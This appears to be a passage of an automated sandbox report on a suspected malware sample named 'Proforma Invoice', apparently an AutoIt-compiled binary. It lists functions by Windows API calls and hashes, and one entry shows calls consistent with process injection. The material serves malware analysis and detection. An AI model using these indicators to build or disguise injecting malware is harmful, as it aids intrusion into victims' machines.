                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: CALL
                                                                                                • API String ID: 0-4196123274
                                                                                                • Opcode ID: 16234a8842e5d7e3e203e0856c3fde1020a88728111aa1a3636a87846b662420
                                                                                                • Instruction ID: db0928cc73dba7bd86a251b53a782ff69781a82bf3032f772adeb1a4aa639bfd
                                                                                                • Opcode Fuzzy Hash: 16234a8842e5d7e3e203e0856c3fde1020a88728111aa1a3636a87846b662420
                                                                                                • Instruction Fuzzy Hash: 76224970508341DFD724EF54C494A6AB7E2BF8A304F14896EE88A8B362D735ED45CF86
                                                                                                APIs
                                                                                                • IsThemeActive.UXTHEME ref: 006A4834
                                                                                                  • Part of subcall function 006C336C: __lock.LIBCMT ref: 006C3372
                                                                                                  • Part of subcall function 006C336C: DecodePointer.KERNEL32(00000001,?,006A4849,006F7C74), ref: 006C337E
                                                                                                  • Part of subcall function 006C336C: EncodePointer.KERNEL32(?,?,006A4849,006F7C74), ref: 006C3389
                                                                                                  • Part of subcall function 006A48FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 006A4915
                                                                                                  • Part of subcall function 006A48FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 006A492A
                                                                                                  • Part of subcall function 006A3B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 006A3B68
                                                                                                  • Part of subcall function 006A3B3A: IsDebuggerPresent.KERNEL32 ref: 006A3B7A
                                                                                                  • Part of subcall function 006A3B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,007652F8,007652E0,?,?), ref: 006A3BEB
                                                                                                  • Part of subcall function 006A3B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 006A3C6F
                                                                                                • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 006A4874
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                                                • String ID:
                                                                                                • API String ID: 1438897964-0
                                                                                                • Opcode ID: ec750a4ce5dc11dd8178311cb7587189eb0873e517854e528e7ffe92aeadfd3c
                                                                                                • Instruction ID: 4a69eb790234958144161a3d7444c207b19a6d055842927d31429e7740843159
                                                                                                • Opcode Fuzzy Hash: ec750a4ce5dc11dd8178311cb7587189eb0873e517854e528e7ffe92aeadfd3c
                                                                                                • Instruction Fuzzy Hash: B0116A719083519FC700EF28E80591ABFE9FB89750F10892EF045832A1DBB89A45CB9A
                                                                                                APIs
                                                                                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,006A5821,?,?,?,?), ref: 006A5CC7
                                                                                                • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,006A5821,?,?,?,?), ref: 006DDD73
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateFile
                                                                                                • String ID:
                                                                                                • API String ID: 823142352-0
                                                                                                • Opcode ID: 1957a9ee6981e1e5c9c5062ba2010b3cfe83e5b507e9e42a6856671f56e44e59
                                                                                                • Instruction ID: 32c19bc70deb640d15347eb33e3e613c2586a0ac0dfa21c321873f94070f36c2
                                                                                                • Opcode Fuzzy Hash: 1957a9ee6981e1e5c9c5062ba2010b3cfe83e5b507e9e42a6856671f56e44e59
                                                                                                • Instruction Fuzzy Hash: C9018471284718BEF7246E24CD8AFB636DDAB02778F108319BAD69A2E0C6B41C458F54
                                                                                                APIs
                                                                                                  • Part of subcall function 006C571C: __FF_MSGBANNER.LIBCMT ref: 006C5733
                                                                                                  • Part of subcall function 006C571C: __NMSG_WRITE.LIBCMT ref: 006C573A
                                                                                                  • Part of subcall function 006C571C: RtlAllocateHeap.NTDLL(01190000,00000000,00000001,00000000,?,?,?,006C0DD3,?), ref: 006C575F
                                                                                                • std::exception::exception.LIBCMT ref: 006C0DEC
                                                                                                • __CxxThrowException@8.LIBCMT ref: 006C0E01
                                                                                                  • Part of subcall function 006C859B: RaiseException.KERNEL32(?,?,?,00759E78,00000000,?,?,?,?,006C0E06,?,00759E78,?,00000001), ref: 006C85F0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                • String ID:
                                                                                                • API String ID: 3902256705-0
                                                                                                • Opcode ID: 42be5edbebdf7285912e81bc2f075b0fe8f89a2cd17fad3ef1941440226e6e2c
                                                                                                • Instruction ID: 5025d2d6bd16b77879a7b73faef90aa592e328a93a626f01155452025e88776e
                                                                                                • Opcode Fuzzy Hash: 42be5edbebdf7285912e81bc2f075b0fe8f89a2cd17fad3ef1941440226e6e2c
                                                                                                • Instruction Fuzzy Hash: 7CF0867150031AA6EB14AA94EC05FFE77AEDF05311F10442DF90996242DFB0AA8185D5
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: __lock_file_memset
                                                                                                • String ID:
                                                                                                • API String ID: 26237723-0
                                                                                                • Opcode ID: bb864ef2f878175a4558ffbd887b3fe2a03ac4f69c6b4a71a24267efd51ea884
                                                                                                • Instruction ID: dc74dadb340841a384cb9881347c86c5b5ecbe2e624f15452fdf59ed6d34291b
                                                                                                • Opcode Fuzzy Hash: bb864ef2f878175a4558ffbd887b3fe2a03ac4f69c6b4a71a24267efd51ea884
                                                                                                • Instruction Fuzzy Hash: C301D471800608AFCF62AF698C02EFE7B63EF91321F40411DF8251B2A1DB319A91DF95
                                                                                                APIs
                                                                                                  • Part of subcall function 006C8B28: __getptd_noexit.LIBCMT ref: 006C8B28
                                                                                                • __lock_file.LIBCMT ref: 006C53EB
                                                                                                  • Part of subcall function 006C6C11: __lock.LIBCMT ref: 006C6C34
                                                                                                • __fclose_nolock.LIBCMT ref: 006C53F6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                • String ID:
                                                                                                • API String ID: 2800547568-0
                                                                                                • Opcode ID: 16ef76c693f91221d278c95d605bdfbf959d21e2187c588507556385ac8b95ef
                                                                                                • Instruction ID: 371ef0265748b228909b6d5f2b5351af06ac63566680dc09508c8f3dcaa0d070
                                                                                                • Opcode Fuzzy Hash: 16ef76c693f91221d278c95d605bdfbf959d21e2187c588507556385ac8b95ef
                                                                                                • Instruction Fuzzy Hash: C2F0F631900A409ED7606B648C01FBD66E2EF41370F20820CA429AB1C1EBFCA9825B59
                                                                                                APIs
                                                                                                • CreateProcessW.KERNELBASE(?,00000000), ref: 01E51ACD
                                                                                                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01E51AF1
                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01E51B13
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1769483837.0000000001E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 01E50000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_1e50000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                • String ID:
                                                                                                • API String ID: 2438371351-0
                                                                                                • Opcode ID: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
                                                                                                • Instruction ID: 901cf9f8cac9fdaaf1928d539c783de78a42d5e5aa8d9ca8f3299c0a2bf52ebc
                                                                                                • Opcode Fuzzy Hash: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
                                                                                                • Instruction Fuzzy Hash: 6412CE24E14658C6EB24DF64D8507DEB232EF68300F10A4E9910DEB7A5E77A4F81CB5A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 00e8777f326f6e6763e27a9b78b87e79e926528d3c1abab5a98db4f7aee92028
                                                                                                • Instruction ID: b0d5594c5fbdea1a24027ac6236dc819d4b2e1bb2b7047c4b341e745b7727cd4
                                                                                                • Opcode Fuzzy Hash: 00e8777f326f6e6763e27a9b78b87e79e926528d3c1abab5a98db4f7aee92028
                                                                                                • Instruction Fuzzy Hash: 10517B71600604ABCF54FB68C995EAE77A7AF86310F14856CF906AB392DA30ED01CB59
                                                                                                APIs
                                                                                                • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 006A5B96
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: FilePointer
                                                                                                • String ID:
                                                                                                • API String ID: 973152223-0
                                                                                                • Opcode ID: 9acdd496d63828723820bc89da77996313a25cbdedfa715b76b7eb407e760a42
                                                                                                • Instruction ID: 6838f860ca7fbac472fe5a864239d902dc09da631496eb49a77c26bc71d69850
                                                                                                • Opcode Fuzzy Hash: 9acdd496d63828723820bc89da77996313a25cbdedfa715b76b7eb407e760a42
                                                                                                • Instruction Fuzzy Hash: A7313C31A00A09AFCB18EF6CC494AADB7B6FF45311F158629E81693714D770BD90CFA1
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: ClearVariant
                                                                                                • String ID:
                                                                                                • API String ID: 1473721057-0
                                                                                                • Opcode ID: a63dabe75c2187d70ab4e44bea37e56d1c56910c0c558144dadc4136a2a1220a
                                                                                                • Instruction ID: a24ff66179ccce10fd7d2eedbc4dace0249d2c2023027a43ffc7da78a3ec9d05
                                                                                                • Opcode Fuzzy Hash: a63dabe75c2187d70ab4e44bea37e56d1c56910c0c558144dadc4136a2a1220a
                                                                                                • Instruction Fuzzy Hash: 644117749043419FDB14DF14C444B5ABBE2BF49314F0988ACE89A8B762C371EC45CF56
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: _memmove
                                                                                                • String ID:
                                                                                                • API String ID: 4104443479-0
                                                                                                • Opcode ID: 85759a854ba029bf67ef2d925c77da5c8078574f3cd5632028c6ea43330c340e
                                                                                                • Instruction ID: 90385e160a84080ddf8be3b3cf33db1b464d678346cf577f705f8fa8ea75cee8
                                                                                                • Opcode Fuzzy Hash: 85759a854ba029bf67ef2d925c77da5c8078574f3cd5632028c6ea43330c340e
                                                                                                • Instruction Fuzzy Hash: 7821E772D10B08EBDB10AF61E8816AA7BBEFF05351F21846FE48AD5210EBB494D0D749
                                                                                                APIs
                                                                                                  • Part of subcall function 006A4BB5: FreeLibrary.KERNEL32(00000000,?), ref: 006A4BEF
                                                                                                  • Part of subcall function 006C525B: __wfsopen.LIBCMT ref: 006C5266
                                                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,007652F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 006A4E0F
                                                                                                  • Part of subcall function 006A4B6A: FreeLibrary.KERNEL32(00000000), ref: 006A4BA4
                                                                                                  • Part of subcall function 006A4C70: _memmove.LIBCMT ref: 006A4CBA
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: Library$Free$Load__wfsopen_memmove
                                                                                                • String ID:
                                                                                                • API String ID: 1396898556-0
                                                                                                • Opcode ID: 5f70865546a7a90429bd9aca4ae63e8e5de54b272b1b0672dcd681fefe5d5c1a
                                                                                                • Instruction ID: 8346493c0d4735b9a73320c05e73894c7974ecf0373d001d5452883423835380
                                                                                                • Opcode Fuzzy Hash: 5f70865546a7a90429bd9aca4ae63e8e5de54b272b1b0672dcd681fefe5d5c1a
                                                                                                • Instruction Fuzzy Hash: 9611BF31600205ABCB11BF70CC16FAD77AAABC5750F10882DF542A6182EEF59E01AB64
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: ClearVariant
                                                                                                • String ID:
                                                                                                • API String ID: 1473721057-0
                                                                                                • Opcode ID: 027abb6ed20727a7697d72653595a049815e69de1b152af874f19ac6333aac8d
                                                                                                • Instruction ID: b790c4b150a45e9ea3847f45b4930baf84e9ed833284d4c766880dfca84fbec5
                                                                                                • Opcode Fuzzy Hash: 027abb6ed20727a7697d72653595a049815e69de1b152af874f19ac6333aac8d
                                                                                                • Instruction Fuzzy Hash: 8D2122B4908341DFDB24EF64C444A5ABBE2BF89314F04886CE88A87722D731E805CF92
                                                                                                APIs
                                                                                                • ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,006A56A7,00000000,00010000,00000000,00000000,00000000,00000000), ref: 006A5C16
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileRead
                                                                                                • String ID:
                                                                                                • API String ID: 2738559852-0
                                                                                                • Opcode ID: 69713887f3840714964f267c7779f1e9840b8c933a34ca69d886bcc7f13a8bab
                                                                                                • Instruction ID: 516483da8c15785e485d545932689a71031c966c8f527b7fb88e722d5e6f7215
                                                                                                • Opcode Fuzzy Hash: 69713887f3840714964f267c7779f1e9840b8c933a34ca69d886bcc7f13a8bab
                                                                                                • Instruction Fuzzy Hash: 9C111375200B049FD320DF19C880BA2B7EAAF45761F10C92EE9AB86A51D7B0EC45CF60
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: _memmove
                                                                                                • String ID:
                                                                                                • API String ID: 4104443479-0
                                                                                                • Opcode ID: 14d5dc22de30b69a2dca6a7e42185d7ce86be11b0e2de9582ebe648f8a374807
                                                                                                • Instruction ID: 758fdf58fd98cc1045d88aff82099e4211a7cf88d5f8bbd7c0336a8a3d6733aa
                                                                                                • Opcode Fuzzy Hash: 14d5dc22de30b69a2dca6a7e42185d7ce86be11b0e2de9582ebe648f8a374807
                                                                                                • Instruction Fuzzy Hash: D9017CB5600942AFC305EB68C441D26F7AAFF8A310714456DE91AC7702DB35EC21CBE4
                                                                                                APIs
                                                                                                • __lock_file.LIBCMT ref: 006C48A6
                                                                                                  • Part of subcall function 006C8B28: __getptd_noexit.LIBCMT ref: 006C8B28
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: __getptd_noexit__lock_file
                                                                                                • String ID:
                                                                                                • API String ID: 2597487223-0
                                                                                                • Opcode ID: d4ebd477d5c37f3185a8c3dac834cca414de2b71543a34adbca230980725fc1b
                                                                                                • Instruction ID: 2906873a6850454224817f25a00a1adc56889e690534be64823e7fd5c178223b
                                                                                                • Opcode Fuzzy Hash: d4ebd477d5c37f3185a8c3dac834cca414de2b71543a34adbca230980725fc1b
                                                                                                • Instruction Fuzzy Hash: A5F08131901645ABDF61EF648805BFE36A2EF10325F15441CB424971D1CF79C951DB55
                                                                                                APIs
                                                                                                • FreeLibrary.KERNEL32(?,?,007652F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 006A4E7E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768995267.0000000000767000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_6a0000_Proforma Invoice.jbxd
                                                                                                Similarity
                                                                                                • API ID: FreeLibrary
                                                                                                • String ID:
                                                                                                • API String ID: 3664257935-0
                                                                                                • Opcode ID: 708d81fe6adaac7c337cc2eb53c5f5384c9b3af5a5438d71e65b5ab529b950fe
                                                                                                • Instruction ID: cf3baa98fe01be841d91fcdd442eee41ae77f316b8c7849352db1fd7d1ed5181
                                                                                                • Opcode Fuzzy Hash: 708d81fe6adaac7c337cc2eb53c5f5384c9b3af5a5438d71e65b5ab529b950fe
                                                                                                • Instruction Fuzzy Hash: B3F03071505711CFCB34AF64D894852B7F2BF95325310893EE2D782611CBB19C40DF40
                                                                                                APIs
                                                                                                • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 006C07B0
                                                                                                  • Part of subcall function 006A7BCC: _memmove.LIBCMT ref: 006A7C06
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1768850399.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                                                                • Associated: 00000000.00000002.1768827120.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.000000000072F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768902335.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.1768956867.000000000075E000.00000004.00000001.01000000.00000003.sdmpDownload File
